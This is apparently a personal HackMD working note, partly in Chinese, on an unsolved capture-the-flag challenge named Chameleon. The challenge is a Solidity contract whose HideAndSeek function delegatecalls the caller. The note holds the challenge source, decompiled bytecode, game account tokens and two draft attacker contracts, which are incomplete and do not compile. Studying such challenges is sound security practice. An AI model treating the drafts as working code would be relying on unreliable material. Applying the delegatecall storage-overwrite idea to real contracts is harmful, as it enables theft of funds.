Chameleon - HackMD

# Chameleon ## account and contract ``` Your game account: 0xb7f5138d3B523e5975510Ee70Cea1372E8F7d663 Your account token: SXZoN7dXxJ0ndfOdbRoXsadDHfi4VlTrmGUIHdj0VbahoEWD3vTF2LJoXhJQhxUXclBUo/BLz25G44DDydSDxeKo8nAHpOeuVr7bRW5QOoDEeC8SsuyNAw6sWz8IOIQ0pNz0CCSZHxLXrq5gb1KDKXmbeIBXlE97P1iXoCsZnF0= Please keep your account token, and transfer some Ether to your game account. The transferred Ether is for transaction fee for deploying your game contracts. Then, continue to Choice 2 to deploy a new game contract. ``` ``` Game contract is deploying... Transaction hash of game contract deployment: 0x17e9ffce96b6a4000415deadf1a4811113a498314f0edd393f338ae541fdac5a Your contract token: LLYpjTL86KFw9o9HlE4b6aPd4ok/+GHUBxOq1s5pD0ExWDbTKS7e461NChis2LdjhuvpwjH/WKT0hwlEj9CEjMJXBBE5AoaoKTlZAan/JJZQXl8zQ1n79I172IXsh5cy+4UzCyw+YFjWqQ0jddczmFMfAs1+UXQBSf1IJiWBWLtOoOiN3fH/sYatR0U6sfBep5siQSIX1pLo9UA2iTylqA== Keep your contract token, and now you may go and solve the challenge! Your goal is to set the `sendFlag` variable in the game contract to `true`. Once you solve the challenge, continue to Choice 3 to request for the flag. ``` ## Functions ```javascript= pragma solidity ^0.5.17; contract Chameleon { uint randomNumber = 0; bool public sendFlag = false; function HideAndSeek() public {} } contract Hack { address target; function run (address _target) public { target = _target; Chameleon instance = Chameleon(target); instance.HideAndSeek(); } function receive () external { if(randomNumber==1){ fallback() } randomNumber = 1; sendflag = True; } } ``` ### yuka: ```javascript= pragma solidity ^0.5.17; contract Chameleon { uint randomNumber = 0; bool public sendFlag = false; function HideAndSeek() public {} } contract Hack { address target; uint randomNumber; bool public sendFlag; bool success; function run (address _target) public { target = _target; Chameleon instance = Chameleon(target); instance.HideAndSeek(); } function receive () external { if(success != false){ require(randomNumber == 1); } else{ sendFlag = true; } } } ``` > abi.encodeWithSignature("") encode structured data (no parameters?) https://docs.soliditylang.org/en/v0.5.3/miscellaneous.html?highlight=abi.encodeWithSignature#global-variables > msg.sender.delegatecall Execute code of another contract, but with the state(storage) of the calling contract. https://medium.com/@houzier.saurav/calling-functions-of-other-contracts-on-solidity-9c80eed05e0f ![](https://i.imgur.com/YQ4x3NN.png) ![](https://i.imgur.com/4yfPARI.png) ![](https://i.imgur.com/bTRKxJi.png) ## source code ```javascript= pragma solidity ^0.5.17; contract Chameleon { uint randomNumber = 0; bool public sendFlag = false; function HideAndSeek() public { bool success; (success,) = msg.sender.delegatecall(abi.encodeWithSignature("")); require(!success); (success,) = msg.sender.delegatecall(abi.encodeWithSignature("")); require(success); } } ``` ## decompiled bytecode 這個decompiled 好像就是題目的sourcecode Chameleon.sol 可以弄在[https://remix.ethereum.org](https://remix.ethereum.org) 上還原function 在vm上點HideAndSeek會出錯 ~~不知道是不是因為沒錢?~~ ~~需要轉錢給Chameleon這個contract嗎?~~ 好像是因為都會success require(!success); ```javascript= # # Panoramix v4 Oct 2019 # Decompiled source of ropsten:0xe38fC5991c67AFe7c4f154142E1ce49B5A0AC04a # # Let's make the world open source # def storage: unknownec19a84f is uint8 at storage 1 def unknownec19a84f() payable: return bool(unknownec19a84f) # # Regular functions # def _fallback() payable: # default function revert def unknownb315c506() payable: mem[132 len 0] = None delegate caller.mem[132 len 4] with: gas gas_remaining wei args require not delegate.return_code if not return_data.size: mem[168 len 0] = None delegate caller.mem[168 len 4] with: gas gas_remaining wei args else: mem[ceil32(return_data.size) + 169 len 0] = None delegate caller.mem[ceil32(return_data.size) + 169 len 4] with: gas gas_remaining wei args require delegate.return_code ``` ###### tags: `unsolved`